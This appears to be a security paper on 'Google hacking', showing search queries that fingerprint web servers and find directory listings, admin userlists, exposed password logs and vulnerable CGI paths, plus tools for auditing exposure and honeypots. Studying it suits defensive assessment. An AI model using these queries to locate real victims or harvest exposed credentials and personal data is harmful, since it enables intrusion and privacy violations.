Google would not necessarily expect the site operator to be used like this:
site:www.cia
site:www
site:cia
The reason for this is simple. ‘Cia’ and ‘www’ are not valid top-level domain names. This
means that as of this writing, Internet names may not end in ‘cia’ or ‘www’. However,
sending unexpected queries like these is part of a competent Google hacker’s arsenal
as we explore in the “googleturds” section.
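To make the operator’s right-anchored behavior concrete, here is a minimal Python sketch (the function name site_queries is mine, not part of any Google tooling) that expands a hostname into the suffix-based queries Google expects:

def site_queries(hostname):
    # The site: operator anchors at the right-hand side of a name, so
    # only trailing pieces of a hostname form "expected" queries.
    parts = hostname.split(".")
    return ["site:" + ".".join(parts[i:]) for i in range(len(parts))]

print(site_queries("www.cia.gov"))
# ['site:www.cia.gov', 'site:cia.gov', 'site:gov']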
How this technique can be used
1. Journalists, snoops and busybodies in general can use this technique to find
interesting ‘dirt’ about a group of websites owned by organizations such as a
government or non-profit organization. Remember that top-level domain names
are often very descriptive and can include interesting groups such as: the U.S.
Government (.gov or .us)
2. Hackers searching for targets. If a hacker harbors a grudge against a specific
country or organization, he can use this type of search to find sensitive targets.
Finding ‘googleturds’ using the ‘site’ operator
Googleturds, as I have named them, are little dirty pieces of Google ‘waste’. These
search results seem to have stemmed from typos Google found while crawling a web
page. Example:
site:csc
site:microsoft
Neither of these queries is valid according to the loose rules of the ‘site’ operator, since
they do not end in valid top-level domain names. However, these queries produce
interesting results as shown in Figure 7.
Figure 7: Googleturd example
These little bits of information are most likely the results of typographical errors in links
placed on web pages.
How this technique can be used
Hackers investigating a target can use munged site values based on the target’s name
to dig up Google pages (and subsequently potential sensitive data) that may not be
available to Google searches using the valid ‘site’ operator. Example: A hacker is
interested in sensitive information about ABCD Corporation, located on the web at
www.ABCD.com. Using a query like ‘site:ABCD’ may find mistyped links
(http://www.abcd instead of http://www.abcd.com) containing interesting information.
Site mapping: More about the ‘site’ operator
Mapping the contents of a web server via Google is simple. Consider the following
query:
site:www.microsoft.com microsoft
This query searches for the word ‘microsoft’, restricting the search to the
www.microsoft.com web site. How many pages on the Microsoft web server contain the
word ‘microsoft?’ According to Google, all of them! Remember that Google searches not
only the content of a page, but the title and URL as well. The word ‘microsoft’ appears in
the URL of every page on www.microsoft.com. With one single query, an attacker gains
a rundown of every web page on a site cached by Google.
There are some exceptions to this rule. If a link on the Microsoft web page points back to
the IP address of the Microsoft web server, Google will cache that page as belonging to
the IP address, not the www.microsoft.com web server. In this special case, an attacker
would simply alter the query, replacing the word ‘microsoft’ with the IP address(es) of the
Microsoft web server.
Google has recently added an additional method of accomplishing this task. This
technique allows Google users to simply enter a ‘site’ query alone. Example:
site:microsoft.com
This technique is simpler, but I’m not sure if this search technique is a permanent
Google feature.
Since Google only follows links that it finds on the Web, don’t expect this technique to
return every single web page hosted on a web server.
How this technique can be used
This technique makes it very simple for any interested party to get a complete rundown
of a website’s structure without ever visiting the website directly. Since Google searches
occur on Google’s servers, it stands to reason that only Google has a record of that
search. The process of viewing cached pages from Google can also be safe as long as
the Google hacker takes special care not to allow his browser to load linked content
such as images from that cached page. For a competent attacker, this is a trivial
exercise. Simply put, Google allows for a great deal of target reconnaissance that results
in little or no exposure for the attacker.
Finding Directory listings
Directory listings provide a list of files and directories in a browser window instead of the
typical text-and graphics mix generally associated with web pages. Figure 8 shows a
typical directory listing.
Figure 8: A typical directory listing
Directory listings are often placed on web servers purposely to allow visitors to browse
and download files from a directory tree. Many times, however, directory listings are not
intentional. A misconfigured web server may produce a directory listing if an index, or
main web page file is missing. In some cases, directory listings are set up as a
temporary storage location for files. Either way, there’s a good chance that an attacker
may find something interesting inside a directory listing.
Locating directory listings with Google is fairly straightforward. Figure 8 shows that most
directory listings begin with the phrase “Index of”, which also shows in the title. An
obvious query to find this type of page might be “intitle:index.of”, which may find
pages with the term ‘index of’ in the title of the document. Remember that the period (.)
serves as a single-character wildcard in Google. Unfortunately, this query will return a
large number of false-positives such as pages with the following titles:
Index of Native American Resources on the Internet
LibDex - Worldwide index of library catalogues
Iowa State Entomology Index of Internet Resources
Judging from the titles of these documents, it is obvious that not only are these web
pages intentional, they are also not the directory listings we are looking for. (*jedi wave*
“This is not the directory listing you’re looking for.”) Several alternate queries provide
more accurate results:
intitle:index.of "parent directory"
intitle:index.of name size
These queries indeed provide directory listings by not only focusing on “index.of” in the
title, but on key words often found inside directory listings such as “parent directory”
“name” and “size.”
How this technique can be used
Bear in mind that many directory listings are intentional. However, directory listings
provide the Google hacker a very handy way to quickly navigate through a site. For the
purposes of finding sensitive or interesting information, browsing through lists of file and
directory names can be much more productive than surfing through the guided content
of web pages. Directory listings provide a means of exploiting other techniques such as
versioning and file searching, explained below.
Versioning: Obtaining the Web Server Software / Version
via directory listings
The exact version of the web server software running on a server is one piece of
information an attacker requires before launching a successful attack against
that web server. If an attacker connects directly to that web server, the HTTP (web)
headers from that server can provide this information. It is possible, however, to retrieve
similar information from Google without ever connecting to the target server under
investigation. One method involves using the information provided in a directory
listing.
Figure 9: Directory listing "server.at" example
Figure 9 shows the bottom line of a typical directory listing. Notice that the directory
listing includes the name of the server software as well as the version. An adept web
administrator can fake this information, but this information is often legitimate, allowing
an attacker to determine what attacks may work against the server. This example was
gathered using the following query:
intitle:index.of server.at
This query focuses on the term “index of” in the title and “server at” appearing at the
bottom of the directory listing. This type of query can additionally be pointed at a
particular web server:
intitle:index.of server.at site:aol.com
The result of this query indicates that gprojects.web.aol.com and vidup-r1.blue.aol.com
both run Apache web servers.
intitle:index.of server.at site:apple.com
The result of this query indicates that mirror.apple.com runs an Apache web server. This
technique can also be used to find servers running a particular version of a web server.
For example:
intitle:index.of "Apache/1.3.0 Server at"
This query will find servers with directory listings enabled that are running Apache
version 1.3.0.
How this technique can be used
This technique is somewhat limited by the fact that the target must have at least one
page that produces a directory listing, and that listing must have the server version
stamped at the bottom of the page. There are more advanced techniques that can be
employed if the server ‘stamp’ at the bottom of the page is missing. One such ‘profiling’
technique involves focusing on the headers, title, and overall format of the directory
listing to observe clues as to what web server software is running.
By comparing known directory listing formats to the target’s directory listing format, a
competent Google hacker can generally nail the server version fairly quickly. This
technique is also flawed in that most servers allow directory listings to be completely
customized, making a match difficult. Some directory listings are not under the control of
the web server at all but instead rely on third-party software. In this particular case, it
may be possible to identify the third party software running by focusing on the source
(‘view source’ in most browsers) of the directory listing’s web page or by using the
profiling technique listed above.
Regardless of how likely it is to determine the web server version of a specific server
using this technique, hackers (especially web defacers) can use this technique to troll
Google for potential victims. If a hacker has an exploit that works against, say Apache
1.3.0, he can quickly scan Google for victims with a simple search like
‘intitle:index.of "Apache/1.3.0 Server at"’. This would return a list of
servers that have at least one directory listing with the Apache 1.3.0 server tag at the
bottom of the listing. This technique can be used for any web server that tags directory
listings with the server version, as long as the attacker knows in advance what that tag
might look like.
via default pages
It is also possible to determine the version of a web server based on default pages.
When a web server is installed, it generally will ship with a set of default web pages, like
the Apache 1.2.6 page shown in Figure 10.
Figure 10: Apache test page
These pages can make it easy for a site administrator to get a web server running. By
providing a simple page to test, the administrator can simply connect to his own web
server with a browser to validate that the web server was installed correctly. Some
operating systems even come with web server software already installed. In this case,
an Internet user may not even realize that a web server is running on his machine. This
type of casual behavior on the part of an Internet user will lead an attacker to rightly
assume that the web server is not well maintained and is, by extension, insecure. By
further extension, the attacker can also assume that the entire operating system of the
server may be vulnerable by virtue of poor maintenance.
How this technique can be used
A simple query of “intitle:Test.Page.for.Apache it.worked!” will return a list
of sites running Apache 1.2.6 with a default home page. Other queries will return similar
Apache results:
Apache server version    Query
Apache 1.3.0 – 1.3.9     intitle:Test.Page.for.Apache It.worked! this.web.site!
Apache 1.3.11 – 1.3.26   intitle:Test.Page.for.Apache seeing.this.instead
Apache 2.0               intitle:Simple.page.for.Apache Apache.Hook.Functions
Apache SSL/TLS           intitle:test.page "Hey, it worked !" "SSL/TLS-aware"
Microsoft’s Internet Information Services (IIS) also ships with default web pages as
shown in Figure 11.
Figure 11: IIS 5.0 default web page
Queries that will locate default IIS web pages include:
IIS Server Version    Query
Many                  intitle:welcome.to intitle:internet IIS
Unknown               intitle:"Under construction" "does not currently have"
IIS 4.0               intitle:welcome.to.IIS.4.0
IIS 4.0               allintitle:Welcome to Windows NT 4.0 Option Pack
IIS 4.0               allintitle:Welcome to Internet Information Server
IIS 5.0               allintitle:Welcome to Windows 2000 Internet Services
IIS 6.0               allintitle:Welcome to Windows XP Server Internet Services
In the case of Microsoft-based web servers, it is not only possible to determine web
server version, but operating system and service pack version as well. This information is
invaluable to an attacker bent on hacking not only the web server, but hacking beyond
the web server and into the operating system itself. In most cases, an attacker with
control of the operating system can wreak more havoc on a machine than a hacker that
only controls the web server.
Netscape Servers also ship with default pages as shown in Figure 12.
Figure 12: Netscape Enterprise Server default page
Some queries that will locate default Netscape web pages include:
Netscape Server Version    Query
Many                       allintitle:Netscape Enterprise Server Home Page
Unknown                    allintitle:Netscape FastTrack Server Home Page
Some queries to find more esoteric web servers/applications include:
Server / Version             Query
Jigsaw / 2.2.3               intitle:"jigsaw overview" "this is your"
Jigsaw / Many                intitle:"jigsaw overview"
iPlanet / Many               intitle:"web server, enterprise edition"
Resin / Many                 allintitle:Resin Default Home Page
Resin / Enterprise           allintitle:Resin-Enterprise Default Home Page
JWS / 1.0.3 – 2.0            allintitle:default home page java web server
J2EE / Many                  intitle:"default j2ee home page"
KFSensor honeypot            "KF Web Server Home Page"
Kwiki                        "Congratulations! You've created a new Kwiki website."
Matrix Appliance             "Welcome to your domain web page" matrix
HP appliance sa1*            intitle:"default domain page" "congratulations" "hp web"
Intel Netstructure           "congratulations on choosing" intel netstructure
Generic Appliance            "default web page" congratulations "hosting appliance"
Debian Apache                intitle:"Welcome to Your New Home Page!" debian
Cisco Micro Webserver 200    "micro webserver home page"
via manuals, help pages and sample programs
Another method of determining server version involves searching for manuals, help
pages or sample programs which may be installed on the website by default. Many web
server distributions install manual pages and sample programs in default locations. Over
the years, hackers have found many ways to exploit these default web applications to
gain privileged access to the web server. Because of this, most web server vendors
insist that administrators remove this sample code before placing a server on the
Internet. Regardless of the potential vulnerability of such programs, the mere existence
of these programs can help determine the web server type and version. Google can
stumble on these directories via a default-installed webpage or other means.
How this technique can be used
In addition to determining the web server version of a specific target, hackers can use
this technique to find vulnerable targets.
Example:
inurl:manual apache directives modules
This query returns pages that host the Apache web server manuals. The Apache
manuals are included in the default installation package of many different versions of
Apache. Different versions of Apache may have different styles of manual, and the
location of manuals may differ, if they are installed at all. As evidenced in Figure 13, the
server version is reported at the top of the manual page. This may not reflect the current
version of the web server if the server has been upgraded since the original installation.
Figure 13: Determining server version via server manuals
Microsoft’s IIS often deploys manuals (termed ‘help pages’) with various versions of its
web server. One way to search for these default help pages is with a query like
‘allinurl:iishelp core’.
Many versions of IIS optionally install sample applications. Many times, these sample
applications are included in a directory called ‘iissamples,’ which may be discovered
using a query like ‘inurl:iissamples’. In addition, the name of a sample program
can be included in the query such as ‘inurl:iissamples advquery.asp’ as shown
in Figure 14.
Figure 14: An IIS server with default sample code installed
Many times, subdirectories may exist inside the samples directory. A page with both the
‘iissamples’ directory and the ‘sdk’ directory can be found with a query like
‘inurl:iissamples sdk’.
There are many more combinations of default manual, help pages and sample programs
that can be searched for. As mentioned above, these programs often contain
vulnerabilities. Searching for vulnerable programs is yet another trick of the Google
hacker.
Using Google to find interesting files and directories
Using Google to find vulnerable targets can be very rewarding. However, it is often more
rewarding to find not only vulnerabilities but to find sensitive data that is not meant for
public viewing. People and organizations leave this type of data on web servers all the
time (trust me, I’ve found quite a bit of it). Now remember, Google is only crawling a
small percentage of the pages that contain this type of data, but the tradeoff is that
the data Google does have can be retrieved quickly, quietly and without much fuss.
It is not uncommon to find sensitive data such as financial information, social security
numbers, medical information, and the like.
How this technique can be used
Of all the techniques examined thus far, this technique is the hardest to describe because
it takes a bit of imagination and sometimes just a bit of luck. Often the best way to find
sensitive files and directories is to find them in the context of other “important” words and
phrases.
inurl: searches
Consider the fact that many people store an entire hodgepodge of data inside backup
directories. Often times, the entire content of a web server or personal computer can be
found in a directory called backup. Using a simple query like “inurl:backup” can
yield potential backup directories, yet refining the search to something like
“inurl:backup intitle:index.of inurl:admin” can reveal even more
relevant results. A query like “inurl:admin” can often reveal administrative
directories.
“inurl:admin inurl:userlist” is a generic catch-all query which finds many
different types of administrative userlist pages. These results may take some sorting
through, but the benefits are certainly worth it, as results include usernames,
passwords, phone numbers, addresses and more.
filetype:
The inurl: search is one way of finding files, but oftentimes the filetype: operator is
much more effective. It is worth noting that every single known file extension (extracted
from filext.com) can be found with Google. This includes file types that Google can not
read. The point is that even if Google can’t parse a file, it still understands the file’s
extension and can search on it.
An interesting technique exists for discovering all known files of a particular extension.
The technique involves the use of the filetype: operator. Consider the following search:
“filetype:cfg cfg”
This search finds files that end in a “cfg” extension. In addition, the file must contain “cfg”
in either the URL, the text or the title. All files of type “cfg” have the term “cfg” in the URL,
so this search shows all known “cfg” files that Google has crawled. When combined with
a site: search, this query can be used to find all “cfg” files from one particular site.
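This enumeration idea is easy to script. A short Python sketch follows; the extension list is illustrative and the function name filetype_queries is mine:

def filetype_queries(extensions, site=None):
    # "filetype:EXT EXT" works because the extension of every file of
    # that type appears in its URL, so the bare term always matches.
    queries = ["filetype:%s %s" % (ext, ext) for ext in extensions]
    if site:
        queries = [q + " site:" + site for q in queries]
    return queries

for q in filetype_queries(["cfg", "log", "xls"], site="example.com"):
    print(q)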
“inurl:admin filetype:xls” can reveal interesting Excel spreadsheets either
named “admin” or stored in a directory named “admin”. Educational institutions are
notorious for falling victim to this search.
combination searches
Combining the techniques listed above can provide more accurate results.
“inurl:admin intitle:login” can reveal admin login pages
“inurl:admin filetype:asp inurl:userlist” will find more specific examples
of an administrator’s user list function, this time written in an ASP page. In most cases,
these types of pages do not require authentication.
ws_ftp.log file searches
Another interesting technique (discovered by murfie) involves scouring ws_ftp.log files
for the existence of files on a web server. The WS_FTP program is a graphical FTP
client for Windows that creates log files tracking all file transfers. Enabled by default,
these log files are placed on the target FTP server and include information about which
files were transferred, where they came from, and where they were ultimately
transferred. Interesting in and of themselves, these files create an excellent opportunity
for the Google hacker to discover files on a web server.
For example, to locate password files, a search like “filetype:log inurl:ws_ftp
intext:password” or “filetype:log inurl:ws_ftp intext:passwd” may
provide useful results.
Using Source Code to find vulnerable targets
Nearly every day, a security advisory is released for some web-based tool. These
advisories often contain information about the version of the software that is affected, the
type of vulnerability and information about how attackers can exploit the vulnerability.
Google can be used to find sites with specific vulnerabilities using only the information
provided in these advisories. We will take a look at how a hacker might use the source
code of a program to discover ways to search for that software with Google.
The CuteNews program had a (minor) vulnerability back in November of 2003:
Figure 15: A typical Security Advisory
As explained in the security advisory, an attacker could use a specially crafted URL to
gain information from a vulnerable target:
Figure 16: Exploit information from a typical advisory
In order to find the best search string to locate potentially vulnerable targets, an attacker
could visit the web page of the software vendor to find the source code of the offending
software. In cases where source code is not available, an attacker can simply download
the offending software and run it on a machine he controls to get ideas for potential
searches. In this case, version 1.3.1 of the CuteNews software is readily available from
the author’s web page.
Once the software is downloaded and optionally unzipped, an attacker must locate the
main web page that would be displayed to visitors. In the case of this particular
software, PHP files are used to display web pages.
Figure 17: The contents of the CuteNews download
Of all the files listed in the main directory of this package, index.php is the most likely
candidate to be a top-level page.
156 // If User is Not Logged In, Display The Login Page
Figure 18: Line 156 of index.php
Line 156 shows a typical informative comment. This comment reveals that this is the
page a user would see if they were not logged in.
173 <td width=80>Username: </td>
174 <td><input tabindex=1 type=text
name=username value='$lastusername' style=\"width:134\"></td>
175 </tr>
176 <tr>
177 <td>Password: </td>
178 <td><input type=password name=password style=\"width:134\"></td>
Figure 19: Lines 173-178 of index.php
Lines 173-178 show typical HTML code and reveal a username and password prompt
that is displayed to the user. Searching for these strings in Google would prove to be too
common. Something more specific must be located. Farther down in the code, a line of
PHP reveals that a footer is placed at the bottom of the page:
191 echofooter();
Figure 20: Line 191 of index.php
In order to discover what this footer looks like, we must locate where the echofooter
function is defined. This can be done simply with grep by searching recursively for
“echofooter” with the word “function” preceding it. This search is more effective than
simply searching for “echofooter” which is called in many of CuteNews’ scripts.
johnny-longs-g4 root# grep -r "function echofooter" *
inc/functions.inc.php:function echofooter(){
johnny-longs-g4 root#
Figure 21: Locating functions in PHP
According to the grep command, we know to look in the file “inc/functions.inc.php” for
footer (and probably the header) text.
Figure 22: The echofooter function
Although there is a great deal of information in this function, there are certain things that
will catch the eye of a Google hacker due to the uniqueness of the string. For example,
line 168 shows that copyrights are printed and that the term “Powered by” is printed in
the footer. Any decent Google hackers knows that “Powered by” lines can be very useful
in locating specific targets due to their high degree of uniqueness. Following the
“Powered by” phrase is a link to http://cutephp.com/cutenews/ and the string
“$config_version_name”, which will list the version name of the CuteNews program. In
order to have a very specific “Powered by” search to feed to Google, the attacker must
either guess as to the version number that would be displayed (remembering that
version 1.3.1 of CuteNews was downloaded) or the actual version number displayed
must be located in the source code. Again, grep can quickly locate this string for us. We
can either search for the string directly, or put an equal sign (‘=’) after the string to find
where it is defined in the code:
johnny-longs-g4 root$ grep -r "\$config_version_name =" *
inc/install.mdu:\$config_version_name = "CuteNews v1.3.1";
inc/options.mdu: fwrite($handler, "<?PHP \n\n//System
Configurations\n\n\$config_version_name =
\"$config_version_name\";\n\n\$config_version_id = $config_version_id;\n\n");
johnny-longs-g4 root$
Figure 23: Searching for the version name
As shown above, the full and complete version name is “CuteNews v1.3.1”. Putting the
two pieces of information together brings us to a very specific Google query: “Powered
by CuteNews v1.3.1”. This query is very specific and locates nearly perfect results which
display sites running version 1.3.1 of the CuteNews software.
Figure 24: Results of the final CuteNews query
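The manual grep work above generalizes easily. The following Python sketch (entirely my own; the "cutenews" directory name and the marker strings are illustrative) walks a downloaded source tree and reports lines containing likely query fodder such as “Powered by”:

import os

def find_markers(source_dir, markers=("Powered by", "version_name")):
    # Walk the unpacked source tree and print any line containing a
    # marker string likely to appear verbatim on rendered pages.
    for root, _dirs, files in os.walk(source_dir):
        for name in files:
            path = os.path.join(root, name)
            try:
                with open(path, errors="ignore") as fh:
                    for number, line in enumerate(fh, 1):
                        if any(m in line for m in markers):
                            print("%s:%d: %s" % (path, number, line.strip()))
            except OSError:
                pass

find_markers("cutenews")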
Using Google as a CGI scanner
One step beyond searching for “interesting” files is searching for vulnerable files via
Google. Many times, when a security vulnerability is discovered in a piece of Web server
software, the vulnerability centers around a particular file. Although it is not technically
accurate to do so, many attackers have come to call this type of vulnerability a CGI
script vulnerability since the early web-based vulnerabilities involved CGI scripts. Today,
web-based vulnerabilities can take many different forms, yet the ‘CGI scanner’ or ‘web
scanner’ has become one of the most indispensable tools in the world of web server
hacking. Mercilessly searching out vulnerable programs on a server, these programs
help pinpoint potential avenues for attack. These programs are brutally obvious,
incredibly noisy and fairly accurate tools. Reduced to the least common denominator,
these types of programs accomplish one task; discovering vulnerable files on a web
server. The accomplished Google hacker knows that this same task can be
accomplished more elegantly and subtly via Google query.
In order to accomplish their task, these scanners must know exactly what to search for on
a web server. In most cases these tools scan web servers looking for vulnerable files or
directories that may contain sample code or other exploitable content. Either
way, the tools generally store these vulnerabilities in a file that is formatted like this:
/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi
/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi
How this technique can be used
The lines in a vulnerability file like the one shown above can serve as a roadmap for a
Google hacker. Each line can be broken down and used in either an ‘index.of’ or an
‘inurl’ search to find vulnerable targets. For example, a Google search for
‘allinurl:/random_banner/index.cgi’ returns the results shown in Figure 25.
Figure 25: Example search using a line from a CGI scanner
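Converting such a vulnerability file into Google queries is easy to automate. A minimal Python sketch (the file name vuln_paths.txt and the function name are mine; scanner files often contain duplicate entries, so the sketch de-duplicates):

def queries_from_scanner_file(path):
    # Each scanner entry is a URL path; stripping the leading slash and
    # prefixing allinurl: turns it into a Google query for that path.
    seen = set()
    queries = []
    for line in open(path):
        line = line.strip().lstrip("/")
        if line and line not in seen:
            seen.add(line)
            queries.append("allinurl:" + line)
    return queries

for q in queries_from_scanner_file("vuln_paths.txt"):
    print(q)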
A hacker can take sites returned from this Google search, apply a bit of hacker ‘magic’
and eventually get the broken ‘random_banner’ program to cough up any file on that
web server, including the password file as shown in Figure 26.
Figure 26: password file captured from a vulnerable site found using a Google search
Of the many Google hacking techniques we’ve looked at, this technique is one of the
best candidates for automation since the CGI scanner vulnerability files can be very
large. The gooscan tool, written by j0hnny, performs this and many other functions.
Gooscan and automation are discussed later.
About Google automated scanning
With so many potential search combinations available, it’s obvious that an automated
tool scanning for a known list of potentially dangerous pages would be extremely useful.
However, Google frowns on such automation as quoted at
http://www.google.com/terms_of_service.html:
“You may not send automated queries of any sort to Google's system without
express permission in advance from Google. Note that "sending automated
queries" includes, among other things:
• using any software which sends queries to Google to determine how a website or webpage "ranks" on Google for various queries;
• "meta-searching" Google; and
• performing "offline" searches on Google.”
Google does offer alternatives to this policy in the form of the Google Web APIs found at
http://www.google.com/apis/. There are several major drawbacks to the Google API
program at the time of this writing. First, users and developers of Google API programs
must both have Google license keys. This puts a damper on the potential user base of
Google API programs. Secondly, API-created programs are limited to 1,000 queries per
day since “The Google Web APIs service is an experimental free program, so the
resources available to support the program are limited.” (according to the API FAQ found
at http://www.google.com/apis/api_faq.html#gen12.) With so many potential searches,
1000 queries is simply not enough.
The bottom line is that any user running an automated Google querying tool (with the
exception of API created tools) must obtain express permission in advance to do so. It is
unknown what the consequences of ignoring these terms of service are, but it seems
best to stay on Google’s good side.
The only exception to this rule appears to be the Google search appliance (described
below). The Google search appliance does not have the same automated query
restrictions since the end user, not Google, owns the appliance. One should, however,
obtain advance express permission from the owner or maintainer of the Google
appliance before searching it with any automated tool for various legal and moral
reasons.
Other Google stuff
Google Appliances
The Google search appliance is described at http://www.google.com/appliance/:
“Now the same reliable results you expect from Google web search can be yours
on your corporate website with the Google Search Appliance. This combined
hardware and software solution is easy to use, simple to deploy, and can be up
and running on your intranet and public website in just a few short hours.”
The Google appliance can best be described as a locally controlled and operated mini-
Google search engine for individuals and corporations. When querying a Google
appliance, the queries listed above in the “URL Syntax” section will often not work.
Extra parameters are often required to perform a manual appliance query. Consider
running a search for "Steve Hansen" at the Google appliance found at Stanford. After
entering this search into the Stanford search page, the user is whisked away to a page
with this URL (chopped for readability):
http://find.stanford.edu/search?q=steve+hansen
&site=stanford&client=stanford&proxystylesheet=stanford
&output=xml_no_dtd&as_dt=i&as_sitesearch=
Breaking this up into chunks reveals three distinct pieces. First, the target appliance is
find.stanford.edu. Next, the query is "steve hansen" or "steve+hansen" and
last but not least are all the extra parameters:
&site=stanford&client=stanford&proxystylesheet=stanford
&output=xml_no_dtd&as_dt=i&as_sitesearch=
These parameters may differ from appliance to appliance, but it has become clear that
there are several default parameters that are required from a default installation of the
Google appliance like the one found at find.stanford.edu.
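The parameter juggling can be scripted. This Python sketch rebuilds the Stanford-style appliance URL from a query and a parameter dictionary; the defaults shown are simply the values observed above, not a documented contract, and other appliances may need different ones:

from urllib.parse import urlencode

def appliance_url(host, query, extra=None):
    # Default parameters observed on the find.stanford.edu appliance.
    params = {"q": query, "site": "stanford", "client": "stanford",
              "proxystylesheet": "stanford", "output": "xml_no_dtd"}
    if extra:
        params.update(extra)
    return "http://%s/search?%s" % (host, urlencode(params))

print(appliance_url("find.stanford.edu", "steve hansen"))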
Googledorks
The term “googledork” was coined by Johnny Long (http://johnny.ihackstuff.com) and
originally meant “An inept or foolish person as revealed by Google.” After a great deal of
media attention, the term came to describe those “who troll the Internet for confidential
goods.” Either term is fine, really. What matters is that the term googledork conveys the
concept that sensitive stuff is on the web, and Google can help you find it. The official
googledorks page (found at http://johnny.ihackstuff.com/googledorks) lists many different
examples of unbelievable things that have been dug up through Google by the
maintainer of the page, Johnny Long. Each listing shows the Google search required to
find the information along with a description of why the data found on each page is so
interesting.
Gooscan
Gooscan (http://johnny.ihackstuff.com) is a UNIX (Linux/BSD/Mac OS X) tool that
automates queries against Google search appliances, but with a twist. These particular
queries are designed to find potential vulnerabilities on web pages. Think "cgi scanner"
that never communicates directly with the target web server, since all queries are sent to
Google, not to the target. For the security professional, gooscan serves as a front-end
for an external server assessment and aids in the "information gathering" phase of a
vulnerability assessment. For the web server administrator, gooscan helps discover what
the web community may already know about a site thanks to Google.
Gooscan was not written using the Google API. This raises questions about the “legality”
of using gooscan as a Google scanner. Is gooscan “legal” to use? You should not use
this tool to query Google without advance express permission. Google appliances,
however, do not have these limitations. You should, however, obtain advance express
permission from the owner or maintainer of the Google appliance before searching it
with any automated tool for various legal and moral reasons. Only use this tool to
query appliances unless you are prepared to face the (as yet unquantified) wrath
of Google.
Although there are many features, the gooscan tool’s primary purpose is to scan Google
(as long as you obtain advance express permission from Google) or Google appliances
(as long as you have advance express permission from the owner/maintainer) for the
items listed on the googledorks page. In addition, the tool allows for a very thorough CGI
scan of a site through Google (as long as you obtain advance express permission from
Google) or a Google appliance (as long as you have advance express permission from
the owner/maintainer of the appliance). Have I made myself clear about how this tool is
intended to be used? Get permission! =) Once you have received the proper advance
express permission, gooscan makes it easy to measure the Google exposure of yourself
or your clients.
GooPot
The concept of a honeypot is very straightforward. According to techtarget.com:
“A honey pot is a computer system on the Internet that is expressly set up to
attract and ‘trap’ people who attempt to penetrate other people's computer
systems.”
In order to learn about how new attacks might be conducted, the maintainers of a
honeypot system monitor, dissect and catalog each attack, focusing on those attacks
which seem unique.
An extension of the classic honeypot system, a web-based honeypot or “pagepot” is
designed to attract those employing the techniques outlined in this paper. The concept is
fairly straightforward. A simple googledork entry like “inurl:admin
inurl:userlist” could easily be replicated with a web-based honeypot by creating
an index.html page which referenced another index.html file in an /admin/userlist
directory. If a web search engine like Google was instructed to crawl the top-level
index.html page, it would eventually find the link pointing to /admin/userlist/index.html.
This link would satisfy the Google query of “inurl:admin inurl:userlist”
eventually attracting a curious Google searcher.
Once the Google searcher clicks on the Google search result, he is whisked away to the target web
page. In the background, the user’s web browser also sends many variables to that web
server, including one variable of interest, the “referrer” variable. This field contains the
complete name of the web page that was visited previously, or more clearly, the web site
that referred the user to the web page. The bottom line is that this variable can be
inspected to figure out how a web surfer found a web page assuming they clicked on
that link from a search engine page. This bit of information is critical to the maintainer of
a pagepot system, since it outlines the exact method the Google searcher used to locate
the pagepot system. The information aids in protecting other web sites from similar
queries.
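Extracting the search that led a visitor to a pagepot is straightforward once the referrer is logged. A rough Python sketch, assuming combined-format access log lines (the file name access.log and the deliberately loose regex are mine):

import re
from urllib.parse import unquote_plus

# Match the q= parameter inside quoted Google referrer URLs in a
# combined-format access log.
REFERRER = re.compile(r'"https?://[^"]*google[^"]*[?&]q=([^&"]+)')

def queries_from_log(path):
    for line in open(path):
        match = REFERRER.search(line)
        if match:
            yield unquote_plus(match.group(1))

for q in queries_from_log("access.log"):
    print(q)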
The concept of a pagepot is not a new one thanks to many folks including the group at
http://www.gray-world.net/. Their web-based honeypot, hosted at
http://www.gray-world.net/etc/passwd/ is designed to entice those using Google like a CGI scanner. This
is not a bad concept, but as we’ve seen in this paper, there are so many other ways to
use Google to find vulnerable or sensitive pages.
Enter GooPot, the Google honeypot system designed by [email protected]. By
populating a web server with sensitive-looking documents and monitoring the referrer
variables passed to the server, a GooPot administrator can learn about new web search
techniques being employed in the wild and subsequently protect his site from similar
queries. Beyond a simple pagepot, GooPot uses enticements based on the many
techniques outlined in the googledorks collection and this document. In addition, the
GooPot more closely resembles the juicy targets that Google hackers typically go after.
Johnny Long, the administrator of the googledorks list, utilizes the GooPot to discover
new search types and publicize them in the form of googledorks listings, creating a self-
sustaining cycle for learning about, and protecting from search engine attacks.
The GooPot system is not publicly available.
Google Sets
When searching for interesting data via Google, most Google hackers eventually run out
of ideas when looking for targets. Enter Google Sets (http://labs.google.com/sets).
Google sets automatically creates lists of items when a user enters a few examples. The
results are based on all the data Google has crawled over the years.
As a simple example, if a user were to enter “Ford” and “Lincoln”, Google sets would
return “Ford, Lincoln, Mercury, Dodge, Chrysler, Jaguar, CADILLAC, Chevrolet, Jeep,
Plymouth, Oldsmobile, Pontiac, Mazda, Honda, and Saturn” and would offer to expand
the list to show even more items.
If, however, the user were to enter “password”, Google would show the terms “Password,
User, Name, username, Host, name, Login, Remote, Directory, shell, directories, User,
ID, userid, Email, Address, Register, name, Email, Login, FTP and HOSTNAME”
Using Google Sets not only helps the Google hacker come up with new ways to search
for sensitive data, it gives a bit of a preview of how the Google results will lean if you
include certain words in a search. This type of exercise can prove to be less time
consuming than sifting through pages of Google results trying to locate trends.
A word about how Google finds pages (Opera)
Although the concept of web crawling is fairly straightforward, Google has created other
methods for learning about new web pages. Most notably, Google has incorporated a
feature into the latest release of the Opera web browser. When an Opera user types a
URL into the address bar, the URL is sent to Google, and is subsequently crawled by
Google’s bots. According to the FAQ posted at http://www.opera.com/adsupport:
“The Google system serves advertisements and related searches to the Opera
browser through the Opera browser banner 468x60 format. Google determines
what ads and related searches are relevant based on the URL and content of the
page you are viewing and your IP address, which are sent to Google via the
Opera browser.”
As of the time of this writing it is unclear whether or not Google includes the link
in its search engine index. However, testing shows that when an unindexed URL
(http://johnny.ihackstuff.com/temp/suck.html) was entered into Opera 7.2.3, a Googlebot
crawled the URL moments later as shown by the following access.log excerpts:
64.68.87.41 - "GET /robots.txt HTTP/1.0" 200 220 "-" "Mediapartners-
Google/2.1 (+http://www.googlebot.com/bot.html)"
64.68.87.41 - "GET /temp/suck.html HTTP/1.0" 200 5 "-" "Mediapartners-
Google/2.1 (+http://www.googlebot.com/bot.html)"
The privacy implications of this could be staggering, especially if Opera users expect
visited URLs to remain private.
